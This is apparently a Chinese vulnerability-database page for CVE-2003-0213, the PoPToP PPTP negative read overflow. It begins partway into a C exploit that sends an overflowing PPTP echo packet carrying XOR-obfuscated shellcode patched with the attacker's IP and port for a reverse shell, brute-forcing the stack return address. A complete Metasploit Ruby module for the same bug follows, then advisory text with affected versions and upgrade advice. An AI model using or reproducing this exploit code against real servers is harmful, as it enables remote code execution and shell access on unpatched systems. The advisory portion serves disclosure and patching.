struct pptp_reply {
	struct pptp_header header;      /* header */
	char buf[10000];
};


/* Magic Cookie */
#define PPTP_MAGIC_COOKIE               0x1a2b3c4d

/* Message types */
#define PPTP_CTRL_MESSAGE               1

/* Control Connection Management */
#define START_CTRL_CONN_RQST            1
#define START_CTRL_CONN_RPLY            2
#define STOP_CTRL_CONN_RQST             3
#define STOP_CTRL_CONN_RPLY             4
#define ECHO_RQST                       5
#define ECHO_RPLY                       6

// brute force values
#define TOPOFSTACK 0xbfffffff
#define BOTTOMOFSTACK 0xbf000000
#define STEP 50

void send_init_request(SOCKET st)
{
        struct pptp_start_ctrl_conn_rqst request;
  	request.header.magic = htonl(PPTP_MAGIC_COOKIE);
  	request.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
        request.header.ctrl_type = htons(START_CTRL_CONN_RQST);

  	request.version = PPTP_VERSION;
        request.framing_cap = 0;
        request.bearer_cap = 0;
        request.max_channels = 1;
        request.firmware_rev = 0;
  	strcpy(request.hostname,"hell");
        strcpy(request.vendor,"domain HELL");
  	request.header.length = ntohs(sizeof(request));

        send(st,(char*)&request,sizeof(request),0);

}

void send_ping_overflow(SOCKET st,DWORD ret,char* hostname,short port)
{ 
	int i;
  	struct pptp_echo_rqst ping;
        ping.header.magic = htonl(PPTP_MAGIC_COOKIE);
  	ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
        ping.header.ctrl_type = htons(ECHO_RQST);
        ping.identifier = 111;

        ping.header.length = ntohs(1);
        
  
        strcpy(ping.buf,"");
        
        int buflen = 500;
        for (i=0;i<buflen;i++) strcat(ping.buf,"\x90");      
        memcpy(ping.buf+364,(char*)&ret,4); 

        // patch shellcode
        // we have a shellcode xored by 0x93.. let's unxor it :)
        for (i=0;i<sizeof(shellcode);i++) shellcode[i] ^= 0x93;

        *(unsigned short int*)(shellcode+43) = htons(port);
        
  	*(unsigned long int*)(shellcode+48) = inet_addr(hostname);

        // we leave 100 bytes for NOPs
        memcpy(ping.buf+100,shellcode,sizeof(shellcode));
                
        send(st,(char*)&ping,sizeof(ping.header)+buflen,0);
 
}

SOCKET st;

int connect_server(char* hostname)
{
        st=socket(PF_INET,SOCK_STREAM,0);
        if (st==-1) return 0;

        struct sockaddr_in addr;

        addr.sin_family=AF_INET;
        addr.sin_port=0;
        addr.sin_addr.s_addr=0;
        bind(st, (struct sockaddr*)&addr,sizeof(addr));
  
        
        addr.sin_family=AF_INET;
        addr.sin_port=htons(1723);
        addr.sin_addr.s_addr=inet_addr(hostname);
        printf("connecting... ");
        if (connect(st,(struct sockaddr*)&addr,sizeof(addr)) != 0)
        {
		perror("connect()");
                return 0;
        }
        return 1;
}

int main(int argc, char** argv)
{
        printf("\n");
        printf("                   D  H     H                            \n");
        printf("                   D  H     H     T\n");
        printf("                   D  H  H  H     T     EE    AA   M   M \n");
        printf("               DDD D  HHHHHHH     T    E  E  A  A  MM MM \n");
        printf("              D   DD  H  H  H    TTTT  E  E  A  A  MM MM \n");
        printf("             D     D  H     H     T    EEE   AAAA  M M M \n");
        printf("              D    D  H     H     T    E     A  A  M   M \n");
        printf("               DDDD   H     H      TTT  EEE  A  A  M   M   ");
        printf(" ... presents ... \n\n");
  	printf("Exploit for PoPToP PPTP server older than \n1.1.4-b3 and 1.1.3-20030409 under Linux.\n");
        printf("by .einstein., April 2003.\n");
        printf("\n");
  if (argc < 2)
  {
        printf("usage: \n");
        printf("  %s <pptp_server> [<your_ip>] [<your_port>] [<timeout>]\n\n",argv[0]);
        printf("    <pptp_server> is the ip address or hostname of the PoPToP server\n");
        printf("      you want to attack.  Port 1723 is used for connection\n");
        printf("    <your_ip> and <your_port> - specify an ip address to which\n");
        printf("      a connection is possible to port <your_port> and set up a\n");
        printf("      netcat listener. You'll get a reverse shell.\n");
        printf("    <timeout> is a delay between stack bruteforce attemts, in milliseconds\n");
        printf("   If you only pass a single parameter, the program will check\n");
        printf("   whether remote server is vulnerable or not. Otherwise it will\n");
        printf("   perform a ret bruteforce.\n");
        printf("usage examples:\n");
        printf("  %s 192.168.1.2 192.168.1.1 5555\n",argv[0]);
        printf("    attack 192.168.1.2 and get a reverse shell on port 5555\n");
        printf("  %s 127.0.0.1 127.0.0.1 6666 100\n",argv[0]);
        printf("    attack a locally running pptpd with a timeout of 100 ms\n");
        printf("    and get a shell on port 6666.\n");
        printf("  %s 192.168.1.56\n",argv[0]);
        printf("    check if the PoPToP server on 192.168.1.56 is vulnerable.\n");
	return 0;
  }


  int timeout = 500;
  if (argc >= 5) timeout = atoi(argv[4]);

        DWORD ret;
        if (argc == 2)
        {
                if (!connect_server(argv[1])) return 1;

                printf("\nChecking if the server is vulnerable..\n");
                printf("(if it is you have to wait 65 seconds)..\n");
                send_init_request(st);

                ret = 0x01010101;
                int bytes;
                struct pptp_reply reply;
                        
                //header length
                bytes = recv(st,(char*)&reply,2,0);
                bytes = ntohs(reply.header.length);
                bytes = recv(st,(char*)&reply+2,bytes-2,0);
                int j = htons(reply.header.ctrl_type);
                send_ping_overflow(st,ret,"0.0.0.0",0);
                        
                //header length
                bytes = recv(st,(char*)&reply,2,0);
                printf("PoPToP server is ");
                if (bytes != -1) printf("vulnerable!\n");
                else printf("not vulnerable\n");
                close(st);

                return 1;
        }

        printf("[!] Attempting bruteforce against %s\n",argv[1]);
        printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3]));
        
        int checked = 0;
        
        for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP)
        {
          	printf("[*] ");
                if (!connect_server(argv[1])) return 1;
        	printf("[ret=0x%x]..",ret);
        	printf("sending payload..");
        
                // initial packet
                send_init_request(st);

                //a real overflowing ping packet
          	send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
                close(st);

                sleep(timeout);
                printf("done\n");
        }
        
        return 0;
}


		

- 漏洞信息 (F82248)

Poptop Negative Read Overflow (PacketStormID:F82248)
2009-10-27 00:00:00
spoonm  
exploit,overflow
CVE-2003-0213
[点击下载]

This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Brute

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Poptop Negative Read Overflow',
			'Description'    => %q{
	 This is an exploit for the Poptop negative read overflow.  This will
    work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
    currently do not have a good way to detect Poptop versions.

    The server will by default only allow 4 concurrent manager processes
    (what we run our code in), so you could have a max of 4 shells at once.

    Using the current method of exploitation, our socket will be closed
    before we have the ability to run code, preventing the use of Findsock.
			},
			'Author'         => 'spoonm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2003-0213'],
					['OSVDB', '3293'],
					['URL',   'http://securityfocus.com/archive/1/317995'],
					['URL',   'http://www.freewebs.com/blightninjas/'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# Payload space is dynamically determined
					'MinNops'         => 16,
					'StackAdjustment' => -1088
				},
			'SaveRegisters'  => [ 'esp' ],
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        => 
				[
					['Linux Bruteforce', 
						{ 'Bruteforce' => 
							{
								'Start'  => { 'Ret' => 0xbffffa00 },
								'Stop'   => { 'Ret' => 0xbffff000 },
								'Step'   => 0
							}
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 9 2003'))

		register_options(
			[
				Opt::RPORT(1723)
			], self.class)

		register_advanced_options(
			[
				OptInt.new("PreReturnLength", [ true, "Space before we hit the return address.  Affects PayloadSpace.", 220 ]),
				OptInt.new("RetLength",       [ true, "Length of returns after payload.", 32 ]),
				OptInt.new("ExtraSpace",      [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
				OptString.new("Hostname",     [ false, "PPTP Packet hostname", '' ]),
				OptString.new("Vendor",       [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
			], self.class)
	end

	# Dynamic payload space calculation
	def payload_space
		datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
	end

	def build_packet(length)
		[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
		[1,0].pack('cc') +
		[0].pack('n') +
		[1,1,0,2600].pack('NNnn') +
		datastore['Hostname'].ljust(64, "\x00") +
		datastore['Vendor'].ljust(64, "\x00")
	end

	def check
		connect
		sock.put(build_packet(156))
		res = sock.get

		if res =~ /MoretonBay/
			return Exploit::CheckCode::Detected
		end

		return Exploit::CheckCode::Safe
	end
		
	def brute_exploit(addrs)
		connect

		print_status("Trying #{"%.8x" % addrs['Ret']}...")

		# Construct the evil length packet
		packet = 
			build_packet(1) +
			payload.encoded +
			([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))

		sock.put(packet)
		
		handler
		disconnect
	end
	
end

    

- 漏洞信息

3293
PoPToP PPTP ctrlpacket.c Negative Read Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

The PoPToP PPTP Server contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered when the server receives a malicious packet with the length field to set either zero or one. This causes a read operation to use a negative value, allowing sensitive memory regions to be overwritten with user-supplied data. It is possible that the flaw may allow arbitrary code execution on the Linux platform, resulting in a loss of integrity or availability.

- 时间线

2003-04-09 Unknow
2003-04-18 Unknow

- 解决方案

Upgrade to at least version 1.1.4-b3 for users of the 1.1.4 tree and version1.1.3-20030409 for users of the 1.1.3 tree. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

PoPToP PPTP Negative read() Argument Remote Buffer Overflow Vulnerability
Boundary Condition Error 7316
Yes No
2003-04-09 12:00:00 2007-11-15 12:39:00
The discovery of this vulnerability has been credited to Timo Sirainen <tss@iki.fi>

- 受影响的程序版本

RedHat Linux 9.0 i386
PoPToP PPTP Server 1.1.4 -b2
PoPToP PPTP Server 1.1.4 -b1
PoPToP PPTP Server 1.1.3 -20021009
PoPToP PPTP Server 1.1.3
PoPToP PPTP Server 1.1.2
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux Personal 8.2
PoPToP PPTP Server 1.0.1
PoPToP PPTP Server 1.0
PoPToP PPTP Server 1.1.4 -b3
PoPToP PPTP Server 1.1.3 -20030409

- 不受影响的程序版本

PoPToP PPTP Server 1.1.4 -b3
PoPToP PPTP Server 1.1.3 -20030409

- 漏洞讨论

A buffer-overflow vulnerability has been discovered in PoPToP PPTP. The problem occurs because the software fails to do sufficient sanity checks when referencing user-supplied input used in various calculations. As a result, an attacker may be able to trigger a condition that would corrupt sensitive memory.

Successful exploits of this issue may allow attackers to execute arbitrary code with the privileges of the affected server.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been released as part of the MetaSploit Framework 2.0.

The following exploits were provided:

- 解决方案

The vendor has released updated versions of the PPTP server to address this issue. Please see the references for details.


PoPToP PPTP Server 1.0

PoPToP PPTP Server 1.1.2

PoPToP PPTP Server 1.1.3 -20021009

PoPToP PPTP Server 1.1.3

PoPToP PPTP Server 1.1.4 -b1

PoPToP PPTP Server 1.1.4 -b2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站